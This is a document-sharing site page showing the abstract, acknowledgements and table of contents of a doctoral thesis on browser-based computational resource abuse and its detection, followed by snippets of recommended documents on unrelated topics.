Computational Resource Abuse in Web Applications

Total Page:16

File Type:pdf, Size:1020Kb

Computational Resource Abuse in Web Applications Computational Resource Abuse in Web Applications Juan David Parra Rodriguez Dissertation eingereicht an der Fakult¨atf¨ur Informatik und Mathematik der Universit¨at Passau zur Erlangung des Grades eines Doktors der Naturwissenschaften A dissertation submitted to the faculty of computer science and mathematics in partial fulfillment of the requirements for the degree of doctor of natural sciences Betreuer: Prof. Dr. rer. nat. Joachim Posegga Passau, Germany, April 2019 Abstract Internet browsers include Application Programming Interfaces (APIs) to support Web applications that require complex functionality, e.g., to let end users watch videos, make phone calls, and play video games. Meanwhile, many Web applications employ the browser APIs to rely on the user's hardware to execute intensive computation, access the Graphics Processing Unit (GPU), use persistent storage, and establish network connections. However, providing access to the system's computational resources, i.e., processing, storage, and networking, through the browser creates an opportunity for attackers to abuse resources. Principally, the problem occurs when an attacker compromises a Web site and includes malicious code to abuse its visitor's computational resources. For example, an attacker can abuse the user's system networking capabilities to perform a Denial of Service (DoS) attack against third parties. What is more, computational resource abuse has not received widespread attention from the Web security community because most of the current specifications are focused on content and session properties such as isolation, confidentiality, and integrity. Our primary goal is to study computational resource abuse and to advance the state of the art by providing a general attacker model, multiple case studies, a thorough anal- ysis of available security mechanisms, and a new detection mechanism. To this end, we implemented and evaluated three scenarios where attackers use multiple browser APIs to abuse networking, local storage, and computation. Further, depending on the scenario, an attacker can use browsers to perform Denial of Service against third-party Web sites, create a network of browsers to store and distribute arbitrary data, or use browsers to establish anonymous connections similarly to The Onion Router (Tor). Our analysis also includes a real-life resource abuse case found in the wild, i.e., CryptoJacking, where thou- sands of Web sites forced their visitors to perform crypto-currency mining without their consent. In the general case, attacks presented in this thesis share the attacker model and two key characteristics: 1) the browser's end user remains oblivious to the attack, and 2) an attacker has to invest little resources in comparison to the resources he obtains. In addition to the attack's analysis, we present how existing, and upcoming, security enforcement mechanisms from Web security can hinder an attacker and their drawbacks. Moreover, we propose a novel detection approach based on browser API usage patterns. Finally, we evaluate the accuracy of our detection model, after training it with the real-life crypto-mining scenario, through a large scale analysis of the most popular Web sites. iii Acknowledgements First of all, I would like to thank Professor Dr. Joachim Posegga for being my advisor and Professor Dr. J¨orgSchwenk for taking the time to be the second reviewer of my thesis. I would also like to thank Benjamin Taubmann for presenting in my stead at one of the conferences when I couldn't travel. I would like to thank Eric Rothstein because he made me realize that you can find jobs where they pay you while you break things and put them back together. Also, I would like to thank my colleagues from the IT security chair with whom I discussed my research, complained about paper rejections, and celebrated paper acceptances. Especially, I would like to thank Daniel Schreckling, Arne Bilzhause, Henrich P¨ohls,Benjamin Taubmann, Eric Rothstein, Luis Ignacio Lopera, and Bastian Braun. Also, I would like to thank Diego Gomez who took the time to read many of my papers before submission. I would like to specially thank Jorge Cuellar for discussing my research ideas on the way to the train station in Passau and at his office in several occasions, as well as Martin Johns for inviting me to the Dagstuhl seminar on Web Application Security where I had the chance to get in touch with great researchers in the field and exchange ideas. Also, I would like to thank Siglinde B¨ock who helped me to sort out many issues during my trips to conferences with the University's administration. Also, I am grateful for the creation of open source tools which allowed me to perform all the evaluations in this thesis1. I would like to thank my father for encouraging me to think critically and learn how things work at a very young age. Also, I would like to thank my mother for reminding me constantly to follow my dreams. I specially thank my brother, his wife, my nephew, and my niece for letting me explore my own path in life while asking the right questions, at the right time, to help me find my way. Last but definitely not least, I thank my wife for the patience and support while I have been working on this thesis. Without her encouragement, this thesis would have fewer publications associated with it ;-). Thanks to my family and my wife's support I eventually found my place doing research in Germany. 1I thought about thanking the creators of awk, ps, cat, grep, sed, uniq, sort, tail, head, scp, pipe, output redirection, the linux shell, and many other tools but there are just too many... v Contents Contents vii 1. Introduction 1 1.1. Outline . .2 1.2. Contributions . .3 1.3. Associated Publications . .4 1.4. Other Peer Reviewed Publications . .4 I. Resource Abuse Aspects 7 2. The Browser Resource Abuse Attack 9 2.1. Motivation . 10 2.2. Attacker Model . 11 2.3. Generic Attack . 11 2.4. Code Delivery Methods . 12 2.4.1. Advertisement Networks . 12 2.4.2. Modified Dependencies and Browser Plug-Ins . 13 2.4.3. Attacking Services and Networking . 13 2.4.4. Stale Inclusions . 14 2.5. Summary . 14 3. The Current Web Security Model and Its Implications For Computational Re- sources 15 3.1. The Origin-Based Security Model . 15 3.1.1. CORS . 16 3.1.2. WebSockets . 17 3.1.3. PostMessages . 18 vii viii Contents 3.1.4. WebRTC . 19 3.2. Tailoring the Origin-Based Security Model . 21 3.2.1. Public Suffix List . 21 3.2.2. Local Storage . 22 3.2.3. Suborigins . 23 3.3. Cross-Protocol Issues at Network Level . 24 3.3.1. WebSockets . 24 3.3.2. WebRTC . 25 3.4. Why Can Origin-Based Mechanisms Not Prevent Resource Abuse? . 26 3.4.1. CORS . 27 3.4.2. WebSockets . 27 3.4.3. PostMessages . 28 3.4.4. WebRTC . 28 3.5. Summary . 30 II. Resource Abuse Case Studies 31 4. Abusing Browsers for Denial of Service against Third-Parties 33 4.1. Background . 33 4.2. Proof of Concept . 34 4.3. Analysis Concerning Browser APIs . 35 4.3.1. Implementation Differences in Handling WebSockets and WebWorkers 35 4.3.2. WebSocket HTTP Header Misinterpretation . 36 4.4. Evaluation . 37 4.4.1. Set-up . 37 4.4.2. Methodology . 38 4.4.3. Results . 39 4.5. Related Work . 47 4.6. Summary . 48 5. Abusing Browsers for Arbitrary Data Storage and Distribution 51 5.1. Background . 52 Contents ix 5.2. Proof of Concept . 53 5.2.1. Client-Side Building Blocks . 53 5.2.2. Server-Side Services . 55 5.2.3. Content Replication Technique . 56 5.3. Analysis Concerning Browser APIs . 57 5.4. Evaluation . 57 5.4.1. Set-Up . 58 5.4.2. Methodology . 59 5.4.3. Peer Behaviour . 60 5.4.4. Results . 60 5.5. Related Work . 64 5.6. Summary . 65 6. Abusing Browsers for Anonymous Communication 67 6.1. Background . 68 6.2. Proof of Concept . 68 6.3. Analysis Concerning Browser APIs . 70 6.4. Methodology . 70 6.5. Evaluation of Scalability . 71 6.5.1. Set-up . 71 6.5.2. Peer Behaviour . 72 6.5.3. Results . 73 6.6. Evaluation of Stealthiness . 77 6.6.1. Set-up . 77 6.6.2. Peer Behaviour . 78 6.6.3. Results . 79 6.7. Related Work . 80 6.8. Summary . 81 7. Abusing Browsers for Crypto-Mining 83 7.1. Background . 84 7.2. Analysis Concerning Browser APIs . 86 x Contents 7.3. Summary . 86 III. Countermeasures 87 8. Enforcement Mechanisms 89 8.1. User-Controlled Mechanisms . 89 8.1.1. Blacklists . 89 8.1.2. Disabling Networking APIs . 90 8.1.3. Third-Party Tracking Protection . 90 8.2. Developer-Controlled Mechanisms . 91 8.2.1. Sand-boxed Environments ..
Recommended publications
  • USA V Cottom Et Al 8:13-Cr-00108-JFB-TDT U.S. District Court District of Nebraska
    8:13-cr-00108-JFB-TDT Doc # 227-1 Filed: 06/29/15 Page 1 of 29 - Page ID # 2406 NIT Forensic and Reverse Engineering Report, Continued from January 2015. USA v Cottom et al 8:13-cr-00108-JFB-TDT U.S. District Court District of Nebraska Investigators: Dr. Ashley Podhradsky, CHFI Dr. Matt Miller Mr. Josh Stroschein 06/05/2015 8:13-cr-00108-JFB-TDT Doc # 227-1 Filed: 06/29/15 Page 2 of 29 - Page ID # 2407 Executive Summary: On December 22nd, 2014 Mr. Joseph Gross retained the assistance of Dr. Ashley Podhradsky, Dr. Matt Miller, and Mr. Josh Stroschein to serve as expert witnesses on USA v Cottom et al, 8:13-cr- 00108-JFB-TDT. The case is in federal court in Omaha and is centered on the viewing and possession of child pornography. The investigators were informed that the central issue of the case is the identification from the FBI’s “Network Investigative Technique” or NIT that was used to identify the IP address of users on The Onion Router (TOR) network. The investigators, Ashley, Matt and Josh, were informed that there were three servers containing contraband images that the FBI found and took offline in November of 2012. Shortly thereafter, the FBI placed the NIT on the servers and put the servers back online with the goal to identify the true IP address of end users accessing the servers through the TOR network. From there, several end users true IP addresses were identified which resulted in actual identification of the end users.
    [Show full text]
  • Gdr 20180123 03 Regions 010 Western Africa 007 02
    PART 2: EAST 18 IN DIGITAL IN 20 WESTERN AFRICA ESSENTIAL INSIGHTS INTO INTERNET, SOCIAL MEDIA, MOBILE, AND ECOMMERCE USE ACROSS THE REGION 2 COUNTRIES INCLUDED IN EACH AFRICA REPORT P P P P ART 1: ART 2: ART 1: ART 2: WEST EAST NORTH SOUTH DIGITAL IN 2018 IN DIGITAL IN 2018 IN DIGITAL IN 2018 IN DIGITAL IN 2018 IN DIGITAL IN 2018 IN DIGITAL IN 2018 IN DIGITAL IN 2018 IN NORTHERN AFRICA WESTERN AFRICA WESTERN AFRICA MIDDLE AFRICA EASTERN AFRICA EASTERN AFRICA SOUTHERN AFRICA ESSENTIAL INSIGHTS INTO INTERNET, SOCIAL MEDIA, MOBILE, AND ECOMMERCE USE ACROSS THE REGION ESSENTIAL INSIGHTS INTO INTERNET, SOCIAL MEDIA, MOBILE, AND ECOMMERCE USE ACROSS THE REGION ESSENTIAL INSIGHTS INTO INTERNET, SOCIAL MEDIA, MOBILE, AND ECOMMERCE USE ACROSS THE REGION ESSENTIAL INSIGHTS INTO INTERNET, SOCIAL MEDIA, MOBILE, AND ECOMMERCE USE ACROSS THE REGION ESSENTIAL INSIGHTS INTO INTERNET, SOCIAL MEDIA, MOBILE, AND ECOMMERCE USE ACROSS THE REGION ESSENTIAL INSIGHTS INTO INTERNET, SOCIAL MEDIA, MOBILE, AND ECOMMERCE USE ACROSS THE REGION ESSENTIAL INSIGHTS INTO INTERNET, SOCIAL MEDIA, MOBILE, AND ECOMMERCE USE ACROSS THE REGION NORTHERN WESTERN AFRICA WESTERN AFRICA MIDDLE EASTERN AFRICA EASTERN AFRICA SOUTHERN AFRICA PART 1: WEST PART 2: EAST AFRICA PART 1: NORTH PART 2: SOUTH AFRICA ALGERIA CABO VERDE BENIN ANGOLA BURUNDI COMOROS BOTSWANA EGYPT GAMBIA BURKINA FASO CAMEROON DJIBOUTI MADAGASCAR LESOTHO LIBYA GUINEA CÔTE D'IVOIRE CENTRAL AFRICAN REP. ERITREA MALAWI NAMIBIA MOROCCO GUINEA-BISSAU GHANA CHAD ETHIOPIA MAURITIUS SOUTH AFRICA SUDAN LIBERIA MALI CONGO, DEM. REP. KENYA MAYOTTE SWAZILAND TUNISIA MAURITANIA NIGER CONGO, REP. RWANDA MOZAMBIQUE WESTERN SAHARA SAINT HELENA NIGERIA EQUATORIAL GUINEA SEYCHELLES RÉUNION SENEGAL TOGO GABON SOMALIA TANZANIA SIERRA LEONE SÃO TOMÉ & PRÍNCIPE SOUTH SUDAN ZAMBIA UGANDA ZIMBABWE 3 CLICK THE COUNTRY NAMES BELOW TO ACCESS OUR IN-DEPTH COUNTRY REPORTS GLOBAL YEARBOOK BRUNEI DOMINICAN REP.
    [Show full text]
  • Uila Supported Apps
    Uila Supported Applications and Protocols updated Oct 2020 Application/Protocol Name Full Description 01net.com 01net website, a French high-tech news site. 050 plus is a Japanese embedded smartphone application dedicated to 050 plus audio-conferencing. 0zz0.com 0zz0 is an online solution to store, send and share files 10050.net China Railcom group web portal. This protocol plug-in classifies the http traffic to the host 10086.cn. It also 10086.cn classifies the ssl traffic to the Common Name 10086.cn. 104.com Web site dedicated to job research. 1111.com.tw Website dedicated to job research in Taiwan. 114la.com Chinese web portal operated by YLMF Computer Technology Co. Chinese cloud storing system of the 115 website. It is operated by YLMF 115.com Computer Technology Co. 118114.cn Chinese booking and reservation portal. 11st.co.kr Korean shopping website 11st. It is operated by SK Planet Co. 1337x.org Bittorrent tracker search engine 139mail 139mail is a chinese webmail powered by China Mobile. 15min.lt Lithuanian news portal Chinese web portal 163. It is operated by NetEase, a company which 163.com pioneered the development of Internet in China. 17173.com Website distributing Chinese games. 17u.com Chinese online travel booking website. 20 minutes is a free, daily newspaper available in France, Spain and 20minutes Switzerland. This plugin classifies websites. 24h.com.vn Vietnamese news portal 24ora.com Aruban news portal 24sata.hr Croatian news portal 24SevenOffice 24SevenOffice is a web-based Enterprise resource planning (ERP) systems. 24ur.com Slovenian news portal 2ch.net Japanese adult videos web site 2Shared 2shared is an online space for sharing and storage.
    [Show full text]
  • Swinglifestyle
    SwingLifestyle Swing Lifestyle aka sls.com! When you say swing, what's the 1st thing that comes to your mind? For me, it's the baseball swing to my neighbor's car, to other's it might be a sew-saw swing or a punch, you know, like swinging. Everyone has their own interpretation of what swinging means to them but if you ask my uncle Ronnie, and by the way, he is a dirty old man who still is a horn dog and has a 30 year younger fiancee, to him, it means changing partners, having sex with them all the while you still remain together with the spouse that you just traded off. Yes, swingers were the taboo of the 70s but now in the 2018s, they are almost outted completely. Still, they are not as overt as some other sex branches are because they have class. When you check out a site called Swinglifestyle.com aka sls.com you will get dates, holiday bookings, sex stories and so much more. It is a site that's dedicated to swingers and it involves everything that comes along for the ride. With the logo that Swing Life Style has I expected a Unicef type of a site. The whole look is like a retirement home site would have, like "Sunny Acres, the only resort that your granny will feel like at home", something like that. That purplish white look just doesn't say "edgy", it says "you're old, get your caskets on time, old timer". I don't know, there was something about the look but fine.
    [Show full text]
  • Threat Modeling and Circumvention of Internet Censorship
    Threat modeling and circumvention of Internet censorship David Fifield September 27, 2017 Abstract Research on Internet censorship is hampered by a lack of adequate models of censor behavior, encompassing both censors' current practice and their likely future evolution. Censor models guide the development of circumvention systems, so it is important to get them right. A censor model should be understood not only as a set of capabilities| such as the ability to monitor network traffic—but also as a set of priorities constrained by resource limitations. A circumvention system designed under inadequate assumptions runs the risk of being either easily blocked, or impractical to deploy. My thesis research will be concerned with developing empirically informed censor models and practical, effective circumvention systems to counter them. My goal is to move the field away from seeing the censorship problem as a cat-and-mouse game that affords only incre- mental and temporary advancements. We should instead state the hypotheses and assumptions under which our circumvention designs will work|with the designs being more or less practical depending on how well the hypotheses and assumptions match the behavior of real-world censors. 1 Thesis My research is about Internet censorship and how to make it ineffective. To this end, I am interested in building useful models of real-world censors as they exist today and may exist in the future, for the purpose of building circumvention systems that are not only sound in theory but also effective in practice. 1 2 Scope Internet censorship is an enormous topic. My thesis research is concerned with one important case of it: the border firewall.
    [Show full text]
  • Computing Fundamentals and Office Productivity Tools It111
    COMPUTING FUNDAMENTALS AND OFFICE PRODUCTIVITY TOOLS IT111 REFERENCENCES: LOCAL AREA NETWORK BY DAVID STAMPER, 2001, HANDS ON NETWORKING FUNDAMENTALS 2ND EDITION MICHAEL PALMER 2013 NETWORKING FUNDAMENTALS Network Structure WHAT IS NETWORK Network • An openwork fabric; netting • A system of interlacing lines, tracks, or channels • Any interconnected system; for example, a television-broadcasting network • A system in which a number of independent computers are linked together to share data and peripherals, such as hard disks and printers Networking • involves connecting computers for the purpose of sharing information and resources STAND ALONE ENVIRONMENT (WORKSTATION) users needed either to print out documents or copy document files to a disk for others to edit or use them. If others made changes to the document, there was no easy way to merge the changes. This was, and still is, known as "working in a stand-alone environment." STAND ALONE ENVIRONMENT (WORKSTATION) Copying files onto floppy disks and giving them to others to copy onto their computers was sometimes referred to as the "sneakernet." GOALS OF COMPUTER NETWORKS • increase efficiency and reduce costs Goals achieved through: • Sharing information (or data) • Sharing hardware and software • Centralizing administration and support More specifically, computers that are part of a network can share: • Documents (memos, spreadsheets, invoices, and so on). • E-mail messages. • Word-processing software. • Project-tracking software. • Illustrations, photographs, videos, and audio files. • Live audio and video broadcasts. • Printers. • Fax machines. • Modems. • CD-ROM drives and other removable drives, such as Zip and Jaz drives. • Hard drives. GOALS OF COMPUTER NETWORK Sharing Information (or Data) • reduces the need for paper communication • increase efficiency • make nearly any type of data available simultaneously to every user who needs it.
    [Show full text]
  • Chrome Devtools Protocol (CDP)
    e e c r i è t t s s u i n J i a M l e d Headless Chr me Automation with THE CRRRI PACKAGE Romain Lesur Deputy Head of the Statistical Service Retrouvez-nous sur justice.gouv.fr Web browser A web browser is like a shadow puppet theater Suyash Dwivedi CC BY-SA 4.0 via Wikimedia Commons Ministère crrri package — Headless Automation with p. 2 de la Justice Behind the scenes The puppet masters Mr.Niwat Tantayanusorn, Ph.D. CC BY-SA 4.0 via Wikimedia Commons Ministère crrri package — Headless Automation with p. 3 de la Justice What is a headless browser? Turn off the light: no visual interface Be the stage director… in the dark! Kent Wang from London, United Kingdom CC BY-SA 2.0 via Wikimedia Commons Ministère crrri package — Headless Automation with p. 4 de la Justice Some use cases Responsible web scraping (with JavaScript generated content) Webpages screenshots PDF generation Testing websites (or Shiny apps) Ministère crrri package — Headless Automation with p. 5 de la Justice Related packages {RSelenium} client for Selenium WebDriver, requires a Selenium server Headless browser is an old (Java). topic {webshot}, {webdriver} relies on the abandoned PhantomJS library. {hrbrmstr/htmlunit} uses the HtmlUnit Java library. {hrbrmstr/splashr} uses the Splash python library. {hrbrmstr/decapitated} uses headless Chrome command-line instructions or the Node.js gepetto module (built-on top of the puppeteer Node.js module) Ministère crrri package — Headless Automation with p. 6 de la Justice Headless Chr me Basic tasks can be executed using command-line
    [Show full text]
  • HTTP Cookie - Wikipedia, the Free Encyclopedia 14/05/2014
    HTTP cookie - Wikipedia, the free encyclopedia 14/05/2014 Create account Log in Article Talk Read Edit View history Search HTTP cookie From Wikipedia, the free encyclopedia Navigation A cookie, also known as an HTTP cookie, web cookie, or browser HTTP Main page cookie, is a small piece of data sent from a website and stored in a Persistence · Compression · HTTPS · Contents user's web browser while the user is browsing that website. Every time Request methods Featured content the user loads the website, the browser sends the cookie back to the OPTIONS · GET · HEAD · POST · PUT · Current events server to notify the website of the user's previous activity.[1] Cookies DELETE · TRACE · CONNECT · PATCH · Random article Donate to Wikipedia were designed to be a reliable mechanism for websites to remember Header fields Wikimedia Shop stateful information (such as items in a shopping cart) or to record the Cookie · ETag · Location · HTTP referer · DNT user's browsing activity (including clicking particular buttons, logging in, · X-Forwarded-For · Interaction or recording which pages were visited by the user as far back as months Status codes or years ago). 301 Moved Permanently · 302 Found · Help 303 See Other · 403 Forbidden · About Wikipedia Although cookies cannot carry viruses, and cannot install malware on 404 Not Found · [2] Community portal the host computer, tracking cookies and especially third-party v · t · e · Recent changes tracking cookies are commonly used as ways to compile long-term Contact page records of individuals' browsing histories—a potential privacy concern that prompted European[3] and U.S.
    [Show full text]
  • Test Driven Development and Refactoring
    Test Driven Development and Refactoring CSC 440/540: Software Engineering Slide #1 Topics 1. Bugs 2. Software Testing 3. Test Driven Development 4. Refactoring 5. Automating Acceptance Tests CSC 440/540: Software Engineering Slide #2 Bugs CSC 440/540: Software Engineering Slide #3 Ariane 5 Flight 501 Bug Ariane 5 spacecraft self-destructed June 4, 1996 Due to overflow in conversion from a floating point to a signed integer. Spacecraft cost $1billion to build. CSC 440/540: Software Engineering Slide #4 Software Testing Software testing is the process of evaluating software to find defects and assess its quality. Inputs System Outputs = Expected Outputs? CSC 440/540: Software Engineering Slide #5 Test Granularity 1. Unit Tests Test specific section of code, typically a single function. 2. Component Tests Test interface of component with other components. 3. System Tests End-to-end test of working system. Also known as Acceptance Tests. CSC 440/540: Software Engineering Slide #6 Regression Testing Regression testing focuses on finding defects after a major code change has occurred. Regressions are defects such as Reappearance of a bug that was previous fixed. Features that no longer work correctly. CSC 440/540: Software Engineering Slide #7 How to find test inputs Random inputs Also known as fuzz testing. Boundary values Test boundary conditions: smallest input, biggest, etc. Errors are likely to occur around boundaries. Equivalence classes Divide input space into classes that should be handled in the same way by system. CSC 440/540: Software Engineering Slide #8 How to determine if test is ok? CSC 440/540: Software Engineering Slide #9 Test Driven Development CSC 440/540: Software Engineering Slide #10 Advantages of writing tests first Units tests are actually written.
    [Show full text]
  • OSS: Using Online Scanning Services for Censorship Circumvention
    OSS: Using Online Scanning Services for Censorship Circumvention David Fifield1, Gabi Nakibly2, and Dan Boneh1 1 Computer Science Department, Stanford University 2 National EW Research & Simulation Center, Rafael { Advanced Defense Systems Ltd. Abstract. We introduce the concept of a web-based online scanning service, or OSS for short, and show that these OSSes can be covertly used as proxies in a censorship circumvention system. Such proxies are suitable both for short one-time rendezvous messages and bulk bidirectional data transport. We show that OSSes are widely available on the Internet and blocking all of them can be difficult and harmful. We measure the number of round trips and the amount of data that can be pushed through various OSSes and show that we can achieve throughputs of about 100 KB/sec. To demonstrate the effectiveness of our approach we built a system for censored users to communicate with blocked Tor relays using available OSS providers. We report on its design and performance. 1 Introduction Nowadays many nations regularly filter Internet traffic by blocking news sites, social networking sites, search sites, and even public mail sites like Gmail. The OpenNet Initiative, which tracks public reports of Internet filtering, lists a large number of countries that filter Internet traffic. Over half of the 74 countries tested in 2011 imposed some degree of filtering on the Internet [1]. In response, several proxy systems have emerged to help censored users freely browse the Internet. Most notable among these is Tor [2], which, while originally designed to provide anonymity, has also seen wide use in circumvention.
    [Show full text]
  • Strider Web Security
    Adversarial Web Crawling with Strider Monkeys Yi-Min Wang Director, Cyber-Intelligence Lab Internet Services Research Center (ISRC) Microsoft Research Search Engine Basics • Crawler – Crawling policy • Page classification & indexing • Static ranking • Query processing • Document-query matching & dynamic ranking – Diversity • Goals of web crawling – Retrieve web page content seen by browser users – Classify and index the content for search ranking • What is a monkey? – Automation program that mimics human user behavior Stateless Static Crawling • Assumptions – Input to the web server: the URL • Stateless client – Output from the web server: page content in HTML • Static crawler ignores scripts Stateful Static Crawling • We all know that Cookies affect web server response • HTTP User-Agent field affects response too – Some servers may refuse low-value crawlers – Some spammers use crawler-browser cloaking • Give crawlers a page that maximizes ranking (=traffic) • Give users a page that maximizes profit Dynamic Crawling • Simple crawler-browser cloaking can be achieved by returning HTML with scripts – Crawlers only parse static HTML text that maximizes ranking/traffic – Users’ browsers additionally execute the dynamic scripts that maximize profit • Usually redirect to a third-party domain to server ads • Need browser-based dynamic crawlers to index the true content Search Spam Example: Google search “coach handbag” Spam Doorway URL = http://coach-handbag-top.blogspot.com http://coach-handbag-top.blogspot.com/ script execution led to redirection
    [Show full text]
  • Threat Modeling and Circumvention of Internet Censorship by David Fifield
    Threat modeling and circumvention of Internet censorship By David Fifield A dissertation submitted in partial satisfaction of the requirements for the degree of Doctor of Philosophy in Computer Science in the Graduate Division of the University of California, Berkeley Committee in charge: Professor J.D. Tygar, Chair Professor Deirdre Mulligan Professor Vern Paxson Fall 2017 1 Abstract Threat modeling and circumvention of Internet censorship by David Fifield Doctor of Philosophy in Computer Science University of California, Berkeley Professor J.D. Tygar, Chair Research on Internet censorship is hampered by poor models of censor behavior. Censor models guide the development of circumvention systems, so it is important to get them right. A censor model should be understood not just as a set of capabilities|such as the ability to monitor network traffic—but as a set of priorities constrained by resource limitations. My research addresses the twin themes of modeling and circumvention. With a grounding in empirical research, I build up an abstract model of the circumvention problem and examine how to adapt it to concrete censorship challenges. I describe the results of experiments on censors that probe their strengths and weaknesses; specifically, on the subject of active probing to discover proxy servers, and on delays in their reaction to changes in circumvention. I present two circumvention designs: domain fronting, which derives its resistance to blocking from the censor's reluctance to block other useful services; and Snowflake, based on quickly changing peer-to-peer proxy servers. I hope to change the perception that the circumvention problem is a cat-and-mouse game that affords only incremental and temporary advancements.
    [Show full text]